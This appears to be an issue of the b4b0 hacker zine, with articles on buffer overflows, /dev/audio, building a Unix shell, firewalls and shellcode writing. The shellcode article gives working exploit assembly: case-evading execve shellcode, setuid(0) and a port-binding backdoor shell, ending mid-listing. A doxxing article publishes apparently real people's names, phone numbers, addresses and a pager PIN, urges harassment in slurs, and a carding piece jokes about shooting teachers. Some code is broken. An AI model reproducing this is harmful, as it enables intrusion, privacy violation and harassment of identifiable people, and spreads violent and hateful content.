The stack is a type of data that is brought up by the ss(stack segment)
register when a program is called to be executed. It is what the programs
execution is based on. It has several functions, but the two important
ones that we need to know, are PUSH and POP. PUSH adds data to the top
of the stack, like instruction code. POP then removes the last piece of
data on the stack, making it smaller. There is also an important register
called the SP register (Stack Pointer), which points to the address of
whatever is at the very top of the stack. This actually varies, depending
on the processor. For example, intel and sparcs, the stack moves in a
downward direction towards lower addresses. So the sp points to the top
of the stack where new instruction is being placed. On other implementations
the stack may move up, so the sp points to the bottom of the stack. In
addition to the stack pointer, there is another register that is commonly
reffered to as FP(Frame pointer). Which points to a frame on the stack.
The distance from the SP(At the top of the stack), and FP(in one of the
stack frames) are subtracted to find the address of local variables and
access them. The return address is in charge of executing instruction
as the addresses are moved down the stack. With all of this in mind,
lets take a look at a simple example and see how the stack might look.
--------------------------example1.c----------------------------------------
#include <stdio.h>
void integer(int x, y) {
char bleh[10];
}
void main(void) {
integer(1,2);
}
----------------------------------------------------------------------------
The stack would look like this.
[ bleh ] [ FP ] [ RET ] [ X ] [ Y ]
Top of the stack Bottom of the stack
How in the hell does all this fit together???
Well, lets look at one more example.
--------------------------example2.c----------------------------------------
#include <stdio.h>
void main(void){
char string[100];
int i;
for(i=0;i<99;i++) {
string[i] = 'A';
}
overflow_dat_shiat(string);
}
overflow_dat_shiat(char *big_string) {
char buffer[32];
strcpy(buffer, big_string);
}
-----------------------------------------------------------------------------
This code has an error. It uses strcpy() which supplies no bounds checking
and copies 100 bytes of 'A' chars, into a buffer that is only 32 bytes.
Therefore, everything on the stack after the 32 byte buffer is being over
written with A's hex value which is 0x41. When this program is ran, it
returns a segementation violation. Why? Because instead of the next set
of instruction for the return address to execute being pushed down to
ret(return address) it was mostly all overwritten with the continuous
hex value of 0x41. Like 0x41414141. So when it tries executing the set
of instruction assigned to 0x414141 it seg faults.
Understanding this, think what would happen if we could get the return
address to execute instructions assigned to a VALID address, maybe
an address that holds code. Code that spawns a shell. We could gain
root if the program were overflowing is +s.
To not get very complex, im going to finish this article with a clean
easy to understand example as to how we can accomplish doing this.
We would want to fill the buffer we are overflowing with code that
spawns a root shell, followed by the address of where the buffer
we are overflowing starts. Take a look. 'X' stands for the code
that executes a shell and will say that "0xF4" is the address
of where the buffer begins.
Buffer FP RET
[XXXXXXXX][XXXX][0xF4] <--- Filled the buffer and FP with shell
instruction followed by the address
of where the shell instruction begins.
So RET(return address) is going to execute
the instruction that is assigned to 0xF4
which happens to be code that spawns a
shell.
Many times we have trouble finding the exact address to where the
buffer begins. So we can just fuck with the address a little bit.
Of course your chances wont be very good at guessing, but there is
something called "Padding" that we can do. We fill about half of
the buffer with something called NOP instruction. And if the return
address executes an address that happens to land anywhere in the
NOP instruction, the NOPS will just keep executing until they reach
are shell code. For our last example, our NOP code stands for 'Y'
and shell code still stands for 'X'. Lets say we dont know that
the start of buffer starts at 0xF4, but were going to assume that
it starts at 0xF6.
Buffer FP RET
[YYYYYYXX][XXXX][0xF6] <--- This would land at the second piece of
our NOP instruction. And although, we
dont have an exact address of where our
shell code starts, are NOP instruction
is going to execute all the way until
it reaches our shell code. The shell
code then continues being executed.
Then poof!@#$ A shell is spawned.
What happens if the buffer we want to overflow happens to be
too small for the shell code to fit in? Well, in most cases
you have access to the environment variables on the stack.
With this in mind, we can stuff the shell code in a one of
the variables, and overflow the buffer with the address
of the variable holding our shell instruction.
How might I go about auditing source code to find buffer overflow errors?
Well in our example, we used the function strcpy(). But there are several
functions that do not do boundary checking. strcpy(), strcat(), sprintf(),
and vsprintf(). gets() is also a problem. Unlike the 4 functions above
which are based on NULL for string termination, gets() reads a line from
stdin into a buffer, until a newline or an EOF. Also, the while() loop
does not check for character overflows. A loop that fills a buffer with
per`se 'A' a specific number of times. So when auditing source, keep your
eye out for these particular functions, and in many cases you will find a
buffer overflow error. Good luck =)
Conclusion:
Hopefully after readin this, you have a better understanding as
to how buffer overflows work and how they are exploited. If so
you might feel comftorable with reading a more in detail and
comprehensive article such as "Smashing the stack for fun and profit"
by Aleph.
Hope you enjoyed this article.
ph1x@b4b0.org
-------------------------------------------------------------------------------------------
<b4b0!b4b0!b4b0!b4b0!> The stupidity that lies in credit fraud, KKR <!b4b0!b4b0!b4b0!b4b0!>
-------------------------------------------------------------------------------------------
I would first like to start by stating the intent of this article. I
have seen far too many of my friends busted for credit card fraud lately.
Its probably one of the dumbest things you can do with your computer skills.
Sure, its probably profitable to card tons of hardware and sell it off at
half the price and make a bundle. Easy money right? Well, you wont be
laughing when you're in jail and owe thousands of dollars to the goverment
for credit card fraud. Now dont get me wrong, if you really want to get busted
then go ahead, this is definatley the way to go. Its probably one of the
easiest ways. There is almost a 100% chance that you will be caught and
arrested, no matter what type of precautions you take. If you get caught
arrested and convicted for credit fraud, the consequences can be extremely
brutal. No matter what age you are, you will almost definatley be tried as
an adult. If convicted, you will never be able to get any type of goverment
job. This doesnt just include the FBI or other high level jobs, but you
wouldnt even be able to qualify for a janitor in a public school, or a
bus driver on a city bus. "Oh," you say, "Well, im really safe about carding
, I use wingates and proxies, and I never order stuff to my house. Theres
no way they can catch me." Wrong. The feds have complicated ways of catching
carders, and trust me, its very hard not to get caught. First of all, proxy
servers and the like can be unsafe. Many times they log all connections, so
the federal agencies have only to call the owners of the machine, and
request the logs for a certain time. A request which they will most usually
comply with. Ever hear of the kids who broke into the pentagon? They used
all sorts of proxies and shit, and what happened to them? They got their
asses caught. Drop email addresses for reply emails from the company you're
carding from can get you caught as well. Places like hotmail and yahoo
usually log the host you're using to get your mail, so that's not safe
either. You like bragging about your carding on IRC? Federal agents
frequent irc carding channels so I'd stay away from them. You think its
safe to card stuff to an empty house? Federal agents can place a small
packet of material that can easily be tracked by trained dogs in the
package if they are investigating you for carding, so if you bring the
merchendise home, your screwed. If you're carding now, stop. If you're
thinking about doing it, think again. I have a much better and more
rewarding idea. Bring a shotgun to school and blast a few teachers, you
have a pretty good chance of getting away with it.
Kaptain Kangaroo
----------------------------------------------------------------------------------------
<!b4b0!b4b0!b4b0!b4b0!> Screwing around with /dev/audio, by ph1x <!b4b0!b4b0!b4b0!b4b0!>
----------------------------------------------------------------------------------------
In unix, all of your devices are reffered to as "special files".
I have heard several people asking about /dev/audio, and how to access it
and take advantage of it etc. I decided to write an article on it.
Below are some functions that I wrote that you can use to read and write
from /dev/audio. Enjoy =)
-------------------------------funct10nZ-------------------------------------
#include <stdio.h>
#include <errno.h>
#include <fcntl.h>
#include <stropts.h>
#include <unistd.h>
#define DEVICE "/dev/audio" /*duh*/
int fd = -1; /* this is our audio device file descriptor */
/* int open_sound(void) {
while(((fd = open(DEVICE, 0_RDWR)) == -1) &&
(errno == EINTR))
;
if(fd <= 0)
return -1;
return 0;
}
void close_sound(void) /* this closes /dev/audio */
{
close(fd);
fd = -1;
}
/* this reads up to maxb bytes from /dev/audio */
int read_sound(char *buff, int maxb)
{
ssize_t bytes;
while (((bytes = read(fd, buff, (size_t)max)) == -1) &&
(errno == EINTR))
;
return(int)bytes;
}
int write_sound(char *buffer, int size)
{
ssize_t written; // bytes written
size_t tried; // bytes tried
char *buffl;
buffl = buffer;
tried = size;
while(tried != 0) {
if((written = write(fd, buffl, tried)) >= 0) {
tried -= written;
buffl += written; }
else if(errno != EINTR)
break;
}
if(written == -1)
return written;
else
return size;
}
-------------------------------------------------------------------------------
So the following function prototypes should be in like bleh.h like so..
int open_sound(void);
void close_sound(void);
int read_sound(char *buff, int maxb);
int write_sound(char *buffer, int size);
-----------------------------------------
Lets write a little proggy that reads from the microphone now.
--------------------------------microphone.c------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <stropts.h>
#include <fcntl.h>
#include <errno.h>
#include "bleh.h"
#define BUF 1024
void main(void) {
char buffer[BUF];
int read;
open_sound();
printf("Speak into your microphone now, HEH!@#$\n");
while(1) {
if((read = read_sound(buffer, BUF)) == -1) {
fprintf(stderr, "Could not read microphone\n");
break;
} else if( write_sound(buffer, read) == -1) {
fprintf(stderr, "Could not write to speakers\n");
break;
}
}
close_sound();
exit(0);
}
----------------------------------------------------------------------------------------
Pretty cool huh? We had a chance to use all of my functions in this
program. Unfortunatley I didnt have alot of time to extend any furthur
on this article. Sorry. Enjoy =)
ph1x@b4b0.org
----------------------------------------------------------------------------------------
<b4b0!b4b0!b4b0!b4b0!> My day in age, by rhinestone cowboy <!b4b0!b4b0!b4b0!b4b0!b4b0!>
----------------------------------------------------------------------------------------
I had an epiphany the other day. It wasn't the kind of flash of
insight that makes you shave your head, move to the desert, and change
your name to something that sounds like an astronomical phenomena, but
I do think it's something that other people need to hear. You see, I
am a professional consultant, and with this project, I became a man.
I was tasked with building a firewall for a healthcare facility. This
wasn't very difficult, and, apart from the planning phases and alot of
mostly useless meetings, it got built in a day or two. All the exceptions
were put in place, and the LAN was protected to a dgree to which it
had never been protected before. All was right with the world...
... Until the client got involved. It started with a simple request.
"Could you please open up telnet services in the firewall to this one
particular Solaris box? We have a few outside consultants who need to
get into that box so they can work remotley. In particular, we have a
user from an educational facility who needs remote root access."
I objected, of course, but I was then informed that it was the
opinion of the IS staff, that this was an "acceptable risk." This wasn't
an opinion that could be justified by anyone, especially after they
shelled out countless thousands of dollars on a "network security solution".
It got a little worse, of course. About a week later, I uncovered a
bug in there web front end to their database. Instead of praise, I got
what I should have expected, exchanges like the following:
"Only people who subscribe to this database should have access. Now you
are telling me that ANYONE on the net can get this data for free? What
the hell is that firewall doing?"
"The firewall is doing it's job. The problem is that your web app. Never
asked me for anything like a password. It just gave me access. It
really wasn't complicated at all. A fireall simply cannot fix your buggy
software.
"Firewalls make computers secure. This computer isn't secure. Obviously,
the fireall you made, doesnt work."
He just didn't get it. I would have been more then happy to spend the
time to audit all the machines individually, apply the proper patches,
and fix any configuration errors that may rear their ugly heads, if the
client was willing to pay for my time. Hell, i'd even work hard!
Unfortunatley, the client didn't want to hear that. He wanted his "magic
bullet, " and if I wasnt willing to provide it, he'd hire another consulting
company to do it.
It then occurred to me, that this senario is being played out all
over the net, and it's alot bigger then I had previously realized. I was
playing a part, so was the IS director, so was my company, and so was the
firewall.
Corporate America is all about "covering your ass." No one wants
accountability for anything. If bullshit and 'passing the buck' were the
keys to world domination, the USA would be the world's only super power.
Wait, never mind...
Anyway, this is what hit me. Firewalls do alot more then filter
packets and give IS gimps a warm fuzzy feeling when they go home at night.
Firewalls manage to almost universally remove any traces of accountability
in corporate security. As in the above example, if, I mean when, someone
sniffs the root password and usese it to compromise the LAN, the IS depart-
ment can pretend that they weren't at fault. They can pass the buck to me
or my company. Fortunatley, there is a contract protecting us from lawsuits
of that nature. If necessary, the buck can even be passed, either by my
company or the clients, to the vendor. Even they can pass the buck, since
any rational person would realize that they weren't involved in this
morass.
The myth of the "fireawall as a magic bullet" is some of the most
useful bullshit ever spun. It allows everyone to sleep easier at night
and make alot of money. Of course, the buck ultimately stops getting
passed by another piece of bullshit, the myth of "the genius hacker." I'm
not saying that there aren't some genuinely brilliant people breaking into
computers these days, but chances are they aren't relying on a 5 year old
sniffer running on a SunOS 4.1.3 box in an .edu site, which is silly
enough to have a guessable NIS mapname.
The world is very broken. We have security products that either
simply don't work, don't work up to the impossible expectations put on them
, or even introduce furthur holes in hosts and networks they are suppose
to be protecting. We also have a world of corperate IS managers, mostly
incompetent "security consultants", and talentless bullshit artists
who manage to social engineer their way into six figure incomes because
they are "reformed hackers."
It would be nice if some kind of messiah of the computer age were to
come along and make it all better. Unfortunately, that's not going to
happen. If there was such a person, we'd either nail him to a cross or he
would opt for the huge paycheck which comes with playing a part in the
system. I suspect I have finally entered into adult life, because I have
little or no desire to change an awfuld system that I can not fix. There
are quite a bit of rewards for being as corrupt as everyone else. So here
is the choice facing us all, either sit down at the table of corruption
and shared guilt and get paid alot (basically sell out) or fight a
hopeless battle against American corporate culture. I think adulthood is
really choosing to play in the "bullshit playground" with the rest of
the grownups. Today, I am a man.
Rhinestone Cowboy
--------------------------------------------------------------------------------
<!b4b0!b4b0!b4b0!b4b0!> d0x (For your harrasing enjoyment) by pG <!b4b0!b4b0!b4b0!b4b0!>
--------------------------------------------------------------------------------
hey kids! it's yer friendly neighborhood nazi death metal anarchist,
racist, fucked up, mentally disturbed, cracked up, dopehead, abortion
supportin, nigger lovin, grave desecrating, dj sporting, rave killing,
teacher hating, school burning, car alarm setting, payphone breaking,
road sign tagging, unethical hacking motherfucker, plastik gezus.
and guess what i got for you people today...that's right people, i've
got a fresh little hax0r kiddie. you all know them, and love to
fuck with them. and since i seem to be like a lamer magnet since
my name gets posted on every "leet-0 hax0r" site on the
internet, i thought i'd share this one special kid with you.
the first thing a pipe-dream hacker needs is a leet handle, as for this
kid, his name is "datasyn." oh wait i'm sorry... "dAtasYn."
my bad... however, that's obviously not his real name. for the sake
of this article we're going to call him... oh.... Mike Feltenberger.
now you may ask yourself what the point of having a el8 hax0r of
your own is. well.. these people can be very fun. for example: say
you're bored and you and your friends are sitting around thinking
of something to do. you've got a phone. well, you could prank call
him. all you would need is a number, like.. say.. 724/588-8963 or
maybe 724/588-9138.
now you're set! see how much fun that is?
or you could shut off his phones all together, all you need is an address
(like 80 Clarksville Street; Greenville, PA) and a tiny bit of skill
and you're all set, my friend.
now i know what you're saying:
"sure this is fun for a few months, but what happens when i get bored
with making his life crap?" well, then you can move on to his
friends. losers always have some homosexual friends. in this case
it would be a little hax0r group called the Hax0rz MatrickZ.
but you say, "well i'm really lame, and i can't get d0x as elite
as you pG, will you help me?"
why of course, friend!
the owner of this wonderfuly leet-0 hax0r gr0up is none other than the
never-heard-of-before-because-has-never-done-anything
nEoGoD. let's call him... say... Josh Hanselman.
"but pG, what do i do with just his name?"
easy, let's pretend you didn't have enough skill to get his phone number (which
is 724/646-1599
btw). you could still get his address using directory services and
post sex ads on yahoo.com. hours of family fun!
"ok pG, but can't i make random calls to other people he knows and start talking
shit about him?"
why of course! now you're thinkin.. you could
get the numbers of his friends too if you were el8 enough. (like
say.. 724/646-0465, 724/475-2294, and 724/253-2750)
see how much fun this is?
"yeah it is, but what about his girlfriends?"
oh that's easy, Erin.. i mean, whoever it may be, can be called and
harassed just as well. like say her phone number was 724/588-0817,
you could call up and say "hey Erin (or whatever her name is),
you sissy cunt, are you ready for my dick bitch?"
"what happens when 5000 people start calling them?"
well, let's say your victim was called vyle-t0ne (724/342-2768) and he
thought he was a leet hax0r, well he would quickly be put in his place and
probably leave the internet in fear.well that's all for now kids. have
fun. and yes, this WAS boring to write just as it was boring to read. so
fuck off kid! my ass is bleeding, bye.
Your friend, Plastic Gezus
*************[BONUS DOX!@#$]************
Coolio: Joseph fillmore 1314
Comstock St. San Diego, CA 92111
Phone: 619-268-8330
-----------------------------------
overdose aka Shawn : 517-262-2199
1-800-800-8689, pin # 80008310
54 (alpha op dispat
ch) 313-238-2660 (numeric/voicemail)
---------------------------------------------------------
Digitalx: (604)951-1191
*****************************************
PS. Dox dropping is lame, but for these 3 gimps, we made
an special exception.
--------------------------------------------------------------------------------
<b4b0!b4b0!b4b0!> Coding a shell from the ground up, ph1x <b4b0!b4b0!b4b0!>
--------------------------------------------------------------------------------
This article I am going to discuss what a shell is, how a shell works
and were going to build a shell from the ground up.
For all source were going to be writing today, we will need b4b0shell.h
included below.
Lets get started. A shell is a program that does command
interpretation. A shell can also be reffered to as a command processor,
as most DOS users know. It reads input, then executes the command.
The execution of a command, is basically creating a child process for
the execution. For example, the shell will fork() a child process to
execute the command. The parent(the shell) will then wait for its child
to finish before it reads another command. Before we start coding, make
sure your using the following header file in all of your codez..
/**********************************/
/* Header file for the b4b0 shell */
/* Extrapolated from ush.h, and */
/* added onto. ph1x@b4b0.org */
/**********************************/
/*
NOTE: We wont be making use of this whole header file today
our shell is not going to have the complexity of your
standard unix shell that you use from a daily to daily
*/ basis.
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/wait.h>
#include <limits.h>
#define STDMODE 0600
#define DELIMITERSET " ><|&" // we are only going to add redirection to
// our shell, not background or pipe support
#ifndef MAX_CANON
#define MAX_CANON 256
#endif
#define TRUE 1
#define FALSE 0
#define BLANK_STRING " "
#define PROMPT_STRING "b4b0$"
#define QUIT_STRING "quit"
#define BACK_STRING "&" // for background process
#define PIPE_STRING "|" // pipe support
#define NEWLINE_STRING "\n"
#define IN_REDIRECT_SYMBOL '<' //redirection
#define OUT_REDIRECT_SYMBOL '>' // symbols
#define NULL_SYMBOL '\0'
#define PIPE_SYMBOL '|'
#define BACK_SYMBOL '&'
#define NEWLINE_SYMBOL '\n'
int makeargv(char *s, char *delimiters, char ***argvp);
int parsefile(char *inbuf, char delimiter, char **v); // this will return
// the token following delimiter if its present in *s.
int redirect(char *infilename, char *outfilename); // performs redirection
int connectpipeline(char *cmd, int frontfd[], int backfd[]);
/*************************-=EOF=-******************************/
First we will write an extremely basic command interpreter,
just for you to get a basic idea as to how a shell calls
a child process to execute commands, and for you to experiment
with.
---------------------------bsh v1.0-----------------------------------
#include "b4b0shell.h"
#define MAX_BUF 500
void main(void) {
char input[MAX_BUF];
char **rargv;
while(1) {
fprintf(stderr, "%s\n" PROMPT_STRING);
fgets(input, MAX_BUF, stdin);
if(strcmp(input, QUIT_STRING) == 0)
break;
else {
if( fork() == 0) {
if(makeargv(input, BLANK_STRING, &rargv) > 0)
execvp(rargv[0], rargv);
}
wait(NULL)
}
}
exit(0);
}
--------------------------------EOF-----------------------------------------
Pretty simple huh? When you run it, go ahead and execute some basic
programs, like ls, grep, find etc. It works! Now, as I said before
this is a very raw basic shell, and does not support wiledcards like
'*' or '?'. Also, it doesnt support certain commands like 'cd' which
is available in any good shell. If by some chance the wait() isnt called?
Well, not too much of a problem, but if a user enters a command before
the previous one is executed, the commands will execute cocurrently
(read my article on cocurrency). Also, due to the fact that this
first version we wrote does not find errors on the execvp() call
it gets fucked up if you enter an invalid command. Your shell wont
get control back from the child process and the child process creates
its OWN shell. So you have to type 'quit' to get back to your parent
shell. Lets write a better version of this shell, that handles errors
with execvp(), and we will also replace the #define'd MAX_BUF with
MAX_CANON(located in b4b0shell.h). Because MAX_BUF is nonportable.
----------------------------bsh v2.0-------------------------------------
#include "b4b0shell.h"
void execthecommand(char *incmd) {
char **rargv;
if(makeargv(incmd, BLANK_STRING, &rargv) > 0) {
if(execvp(rargv[0], rargv) == -1) {
printf("Invalid command\n");
exit(1);
}
}
exit(1);
}
void main(void) {
char input[MAX_CANON];
pid_t child_pid;
while(1) {
fputs(PROMPT_STRING, stdout);
if (fgets(input, MAX_CANON, stdin) == NULL)
break;
if(*(input + strlen(input) -1) == NEWLINE_SYMBOL)
*(input + strlen(input - 1) = 0;
if(strcmp(input, QUIT_STRING) == 0)
break;
else {
if ((child_pid = fork()) == 0) {
execthecommand(input);
exit(1);
}
else if(child_pid > 0)
wait(NULL);
}
}
exit(0);
}
------------------------------EOF-----------------------------------------
We made several changes to version 2 of our shell. Notice we used fputs()
instead of fprintf() for the command line. fputs() prints a defined string
alot faster. Also, notice we did some more error checking in this version.
Also notice we now have the function execthecommand() to replace the
original execvp() and makeargv calls. Control will never come back
from the function execthecommand(), so you shouldnt be having a problem
when you enter invalid commands.
Unix deals with input/output through file descriptors. A program has to
open a file or a device before it can access it. It will then access
the file using a handle that is returned by open() syscall. With
the support of re-direction, you can do stuff like this.
b4b0$ cat < input.txt > output.txt
That command redirects its standard input to 'input.txt' and its output
to 'output.txt'.
The following, is a revised version of execthecommand() function that you
can use to support redirection. I basically made execthecommand() parse
*incmd, which might give possible redirection. It then calls redirect()
to perform the actual redirection, and makeargv() create the command
array. It then execs the command.
-----------------------------execthecommand() v2.0 by ph1x--------------------
#include "b4b0shell.h"
void execthecommand(char *incmd)
{
char **rargv;
char *infile;
char *outfile;
if(parsefile(incmd, IN_REDIRECT_SYMBOL, &infile) == -1)
printf("Incorrect input redirection\n");
else if
(parsefile(incmd, OUT_REDIRECT_SYMBOL, &outfile) == -1)
printf("Incorrect output redirection\n");
else if
(redirect(infile, outfile) == -1)
printf("redirection failed!@#$\n");
else if(makeargv(incmd, BLANK_STRING, &chargv) > 0) {
if(execvp(rargv[0], rargv) == -1)
printf("Invalid command\n");
}
exit(1);
}
--------------------------EOF---------------------------------------------
Change the execthecommand() in bsh v2.0 to the one I modified for
redirection support.
Lets take a look at our final shell.
--------------------------bsh v3.0--------------------------------------
#include "b4b0shell.h"
void execthecommand(char *incmd)
{
char **rargv;
char *infile;
char *outfile;
if(parsefile(incmd, IN_REDIRECT_SYMBOL, &infile) == -1)
printf("Incorrect input redirection\n");
else if
(parsefile(incmd, OUT_REDIRECT_SYMBOL, &outfile) == -1)
printf("Incorrect output redirection\n");
else if
(redirect(infile, outfile) == -1)
printf("redirection failed!@#$\n");
else if(makeargv(incmd, BLANK_STRING, &chargv) > 0) {
if(execvp(rargv[0], rargv) == -1)
printf("Invalid command\n");
}
exit(1);
}
void main(void) {
char input[MAX_CANON];
pid_t child_pid;
while(1) {
fputs(PROMPT_STRING, stdout);
if (fgets(input, MAX_CANON, stdin) == NULL)
break;
if(*(input + strlen(input) -1) == NEWLINE_SYMBOL)
*(input + strlen(input - 1) = 0;
if(strcmp(input, QUIT_STRING) == 0)
break;
else {
if ((child_pid = fork()) == 0) {
execthecommand(input);
exit(1);
}
else if(child_pid > 0)
wait(NULL);
}
}
exit(0);
}
------------------------------EOF--------------------------------------
Redirection is the last feature we are going to put in our shell.
Unfortunatley, I was busy as hell getting b4b0 7 together, and I
didnt have much time to add support for pipes, background processes,
jobcontrol(allows a user to move the foreground process group into
the background, and vice versa), or most of the other things that
a good shell features. This was merely for your learning and enjoyment.
Hope you gained something out of it. Feel free to look up the functions
in b4b0shell.h that we didnt use, and extend onto your shell.
Bye. HEH!@#$
ph1x@b4b0.org
-------------------------------------------------------------------------------------
<!b4b0!b4b0!b4b0!b4b0!> The art of making shell code, by smiler. <!b4b0!b4b0!b4b0!b4b0!>
-------------------------------------------------------------------------------------
Hopefully you are familiar with generic shell-spawning shellcode. If not
read Aleph's text "Smashing The Stack For Fun And Profit" before
reading further. This article will concentrate on the types of shellcode
needed to exploit daemons remotely. Generally it is much harder to exploit
remote daemons, because you do not have many ways of finding out the
configuration of the remote server. Often the shellcode has to be much
more complicated, which is what this article will focus on.
I will start by looking at the ancient IMAP4 exploit. This is a fairly
simple exploit. All you need to do is "hide" the /bin/sh" string in
shellcode (imapd converts all lowercase characters into uppercase).
None of the instructions in the generic shell-spawning shellcode contain
lower-case characters, so you all you need do is change the /bin/sh
string.
It is the same as normal shellcode, except there is a loop which adds
0x20 to each byte in the "/bin/sh" string. I put in lots of comments so
even beginners can understand it. Sorry to all those asm virtuosos :]
-----imap.S-------
.globl main
main:
jmp call
start:
popl %ebx /* get address of /bin/sh */
movl %ebx,%ecx /* copy the address to ecx */
addb $0x6,%cl /* ecx now points to the last character */
loop:
cmpl %ebx,%ecx
jl skip /* if (ecx<ebx) goto skip */
addb $0x20,(%ecx) /* adds 0x20 to the byte pointed to by %ecx */
decb %cl /* move the pointer down by one */
jmp loop
skip:
/* generic shell-spawning code */
movl %ebx,0x8(%ebx)
xorl %eax,%eax
movb %eax,0x7(%ebx)
movl %eax,0xc(%ebx)
movb $0xb,%al
leal 0x8(%ebx),%ecx
leal 0xc(%ebx),%edx
int $0x80
xorl %eax,%eax
inc %al
int $0x80
call:
call start
.string "\x0f\x42\x49\x4e\x0f\x53\x48"
--------------
This was a very simple variation on the generic shellcode and can be
useful to mask characters that aren't allowed by the protocol the daemon
uses. But when coding remote, or even local, exploits you have to be
prepared to write code which is much more complex. This usually means
writing shellcode that involves different syscalls.
Useful syscalls are:
setuid(): To regain dropped root priviledges (e.g. wu-ftpd)
mkdir()/chdir()/chroot(): To drop back to root directory (e.g. wu-ftpd)
dup2(): To connect a tcp socket to the shell (e.g. BIND&rpc.mountd tcp-style )
open()/write(): To write to /etc/passwd (e.g. everything !)
socket(): To write connectionless shellcode, as explained later.
The actual syscall numbers can be found in <asm/unistd.h>
Most syscalls in linux x86 are done in the same way. The syscall number
is put into register %eax, and the arguments are put into %ebx,%ecx and
%edx respectively. In some cases, where there are more arguments than
registers it may be necessary to store the arguments in user memory and
store the address of the arguments in the register. Or, if an argument
is a string, you would have to store the string in user memory and pass
the address of string as the argument. As before, the syscall is called
by "int $0x80".
You can potentially use any syscall, but the ones mentioned above should
just about be the only ones you will ever need.
As an example heres a little shellcode snippet from my wu-ftpd exploit
that should execute setuid(0).
Note: you should always zero a register before using it.
---setuid.S----
.globl main
main:
xorl %ebx,%ebx /* zero the %ebx register, i.e. the 1st argument */
movl %ebx,%eax /* zero out the %eax register */
movb $0x17,%al /* set the syscall number */
int $0x80 /* call the interrupt handler */
---------------
Port-Binding Shellcode
When you are exploiting a daemon remotely with generic shellcode, it is
necessary to have an active TCP connection to pipe the shell stdin/out/err
over. This is applicable to all the remote linux exploits I've seen so
far, and is the preferred method.
But it is possible that a new vulnerability may be found, in a daemon
that only offers a UDP service (SNMP for example). Or it may only be
possible to access the daemon via UDP because the TCP ports are
firewalled etc. Current linux remote vulnerabilites are exploitable
via UDP - BIND as well as all rpc services run both UDP and TCP
services. Also, if you send the exploit via UDP it is trivial to spoof the
attacking udp packet so that you do not appear in any logs =)
To exploit daemons via UDP you could write shellcode to modify the
password file or to perform some other cunning task, but an interactive
shell is much more elite =] Clearly it is not possible to fit a UDP pipe
into shellcode, you still need a TCP connection. So my idea was to write
shellcode that behaved like a very rudimentary backdoor, it binds to a
port and executes a shell when it receives a connection.
I know for a fact that I wasn't the first one to write this type of
shellcode, but no one has officially published it so...here goes.
A basic bindshell program(without the style) looks like this:
int main()
{
char *name[2];
int fd,fd2,fromlen;
struct sockaddr_in serv;
fd=socket(AF_INET,SOCK_STREAM,0);
serv.sin_addr.s_addr=0;
serv.sin_port=1234;
serv.sin_family=AF_INET;
bind(fd,(struct sockaddr *)&serv,16);
listen(fd,1);
fromlen=16; /*(sizeof(struct sockaddr)*/
fd2=accept(fd,(struct sockaddr *)&serv,&fromlen);
/* "connect" fd2 to stdin,stdout,stderr */
dup2(fd2,0);
dup2(fd2,1);
dup2(fd2,2);
name[0]="/bin/sh";
name[1]=NULL;
execve(name[0],name,NULL);
}
Obviously, this is going to require a lot more space than normal
shellcode, but it can be done in under 200 bytes and most buffers are
quite a bit larger than that.
There is a slight complication in writing this shellcode as socket
syscalls are done slightly differently than other syscalls, under linux.
Every socket call has the same syscall number, 0x66. To differentiate
between different socket calls, a subcode is put into the register %ebx.
These can be found in <linux/net.h>. The important ones being:
SYS_SOCKET 1
SYS_BIND 2
SYS_LISTEN 4
SYS_ACCEPT 5
We also need to know the values of the constants, and the exact
structure of sockaddr_in. Again these are in the linux include files.
AF_INET == 2
SOCK_STREAM == 1
struct sockaddr_in {
short int sin_family; /* 2 byte word, containing AF_INET */
unsigned short int sin_port; /* 2 byte word, containg the port in network byte order */
struct in_addr sin_addr /* 4 byte long, should be zeroed */
unsigned char pad[8]; /* should be zero, but doesn't really matter */
};
Since there are only two registers left, the arguments must be placed
sequentially in user memory, and %ecx must contain the address of the
first. Hence we have to store the arguments at the end of the shellcode.
The first 12 bytes will contain the 3 long arguments, the next 16 will
contain the sockaddr_in structure and the final 4 will contain fromlen
for the accept() call. Finally the result from each syscall is held in
%eax.
So, without further ado, here is the portshell warez...
Again I've over-commented everything.
----portshell.S----
.globl main
main:
/* I had to put in a "bounce" in the middle of the code as the shellcode
* was too big. If I had made it jmp the entire shellcode, the instruction
* would have contained a null byte, so if anyone has a shorter version,
* please send me it.
*/
jmp bounce
start:
popl %esi
/* socket(2,1,0) */
xorl %eax,%eax
movl %eax,0x8(%esi) /* 3rd arg == 0 */
movl %eax,0xc(%esi) /* zero out sock.sin_family&sock.sin_port */
movl %eax,0x10(%esi) /* zero out sock.sin_addr */
incb %al
movl %eax,%ebx /* socket() subcode == 1 */
movl %eax,0x4(%esi) /* 2nd arg == 1 */
incb %al
movl %eax,(%esi) /* 1st arg == 2 */
movw %eax,0xc(%esi) /* sock.sin_family == 2 */
leal (%esi),%ecx /* load the address of the arguments into %ecx */
movb $0x66,%al /* set socket syscall number */
int $0x80
/* bind(fd,&sock,0x10) */
incb %bl /* bind() subcode == 2 */
movb %al,(%esi) /* 1st arg == fd (result from socket()) */
movl %ecx,0x4(%esi) /* copy address of arguments into 2nd arg */
addb $0xc,0x4(%esi) /* increase it by 12 bytes to point to sockaddr struct */
movb $0x10,0x8(%esi) /* 3rd arg == 0x10 */
movb $0x23,0xe(%esi) /* set sin.port */
movb $0x66,%al /* no need to set %ecx, it is already set */
int $0x80
/* listen(fd,2) */
movl %ebx,0x4(%esi) /* bind() subcode==2, move this to the 2nd arg */
incb %bl /* no need to set 1st arg, it is the same as bind() */
incb %bl /* listen() subcode == 4 */
movb $0x66,%al /* again, %ecx is already set */
int $0x80
/* fd2=accept(fd,&sock,&fromlen) */
incb %bl /* accept() subcode == 5 */
movl %ecx,0x4(%esi) /* copy address of arguments into 2nd arg */
addb $0xc,0x4(%esi) /* increase it by 12 bytes */
movl %ecx,0x4(%esi) /* copy address of arguments into 3rd arg */
addb $0x1c,0x4(%esi) /* increase it by 12+16 bytes */
movb $0x66,%al
int $0x80
/* KLUDGE */
jmp skippy
bounce:
jmp call
skippy:
/* dup2(fd2,0) dup2(fd2,1) dup2(fd2,2) */
movb %al,%bl /* move fd2 to 1st arg */
xorl %ecx,%ecx /* 2nd arg is 0 */
movb $0x3f,%al /* set dup2() syscall number */
int $0x80
incb %cl /* 2nd arg is 1 */
movb $0x3f,%al
int $0x80
incb %cl /* 2nd arg is 2 */
movb $0x3f,%al
int $0x80
/* execve("/bin/sh",["/bin/sh"],NULL) */
